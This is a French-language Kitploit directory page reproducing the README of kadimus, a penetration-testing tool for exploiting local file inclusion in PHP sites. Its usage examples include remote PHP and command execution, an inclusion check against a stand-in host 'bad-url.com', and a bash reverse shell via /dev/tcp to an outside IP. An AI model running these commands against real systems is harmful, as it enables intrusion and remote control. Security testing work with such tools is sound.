Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
kadimus — kadimus is a tool to check and exploit lfi vulnerability. | Kitploit
Outils/GitHubGitHub/p0cl4bs/kadimus
Vulnerability ScannersCode AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access ToolArchived
GitHubp0cl4bs/kadimus

kadimus

kadimus is a tool to check and exploit lfi vulnerability.

Voir le dépôt
575127il y a 6 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Rawsec's CyberSecurity Inventory GitHub stars GitHub license

kadimus

Outil de scan et d'exploitation LFI

kadimus est un outil pour vérifier et exploiter les vulnérabilités LFI, avec un accent sur les systèmes PHP.

Fonctionnalités :

  • Vérifier tous les paramètres d'URL
  • /var/log/auth.log RCE
  • /proc/self/environ RCE
  • php://input RCE
  • data://text RCE
  • expect://cmd RCE
  • Divulgation du code source
  • Interface shell de commande via requête HTTP
  • Support proxy (socks4://, socks4a://, socks5:// ,socks5h:// et http://)
  • Support proxy socks5 pour les connexions distantes

Compilation :

Tout d'abord, assurez-vous d'avoir toutes les dépendances installées sur votre système : libcurl, libopenssl, libpcre et libssh.

Ensuite, vous pouvez cloner le dépôt pour obtenir le code source :

root@kitploit:~
$ git clone https://github.com/P0cL4bs/kadimus.git
$ cd kadimus

Et enfin :

root@kitploit:~
$ make

Options :

root@kitploit:~
Options:
  -h, --help                    Display this help menu

  Request:
    -B, --cookie STRING         Set custom HTTP cookie header
    -A, --user-agent STRING     User-Agent to send to server
    --connect-timeout SECONDS   Maximum time allowed for connection
    --retry NUMBER              Number of times to retry if connection fails
    --proxy STRING              Proxy to connect (syntax: protocol://hostname:port)

  Scanner:
    -u, --url STRING            URL to scan/exploit
    -o, --output FILE           File to save output results

  Explotation:
    --parameter STRING          Parameter name to inject exploit
                                (only needed by RCE data and source disclosure)

  RCE:
    -T, --technique=TECH        LFI to RCE technique to use
    -C, --code STRING           Custom PHP code to execute, with php brackets
    -c, --cmd STRING            Execute system command on vulnerable target system
    -s, --shell                 Simple command shell interface through HTTP request

    --connect STRING            IP/hostname to connect to
    -p, --port NUMBER           Port number to connect to or listen on
    -l, --listen                Bind and listen for incoming connections

    --ssh-port NUMBER           Set the SSH port to try command injection (default: 22)
    --ssh-target STRING         Set the SSH host

    RCE Available techniques

      environ                   Try to run PHP code using /proc/self/environ
      input                     Try to run PHP code using php://input
      auth                      Try to run PHP code using /var/log/auth.log
      data                      Try to run PHP code using data://text
      expect                    Try to run a command using expect://cmd

    Source Disclosure:
      -S, --source              Try to get the source file using filter://
      -f, --filename STRING     Set filename to grab source [REQUIRED]
      -O FILE                   Set output file (default: stdout)

Exemples :

Analyse :

root@kitploit:~
./kadimus -u localhost/?pg=contact -A my_user_agent

Obtenir le code source du fichier :

root@kitploit:~
./kadimus -u localhost/?pg=contact -S -f "index.php%00" -O local_output.php --parameter pg

Exécuter du code PHP :

root@kitploit:~
./kadimus -u localhost/?pg=php://input%00 -C '<?php echo "pwned"; ?>' -T input

Exécuter une commande :

root@kitploit:~
./kadimus -t localhost/?pg=/var/log/auth.log -T auth -c 'ls -lah' --ssh-target localhost

Vérification des RFI :

Vous pouvez également vérifier les erreurs RFI -- placez simplement l'URL distante dans resource/common_files.txt et l'expression régulière pour les identifier, exemple :

root@kitploit:~
/* http://bad-url.com/shell.txt */
<?php echo base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU="); ?>

dans le fichier :

root@kitploit:~
http://bad-url.com/shell.txt?:scorpion say get over here

Shell inversé :

root@kitploit:~
./kadimus -u localhost/?pg=contact.php -T data --parameter pg -lp 12345 -c '/bin/bash -c "bash -i >& /dev/tcp/172.17.0.1/1234 0>&1"' --retry-times 0

Contributing

Vous pouvez aider avec du code, ou en faisant un don. Si vous souhaitez aider avec du code, utilisez le style de code du noyau comme référence.

Paypal:

BTC: 1PpbrY6j1HNPF7fS2LhG9SF2wtyK98GSwq

Télécharger l’outil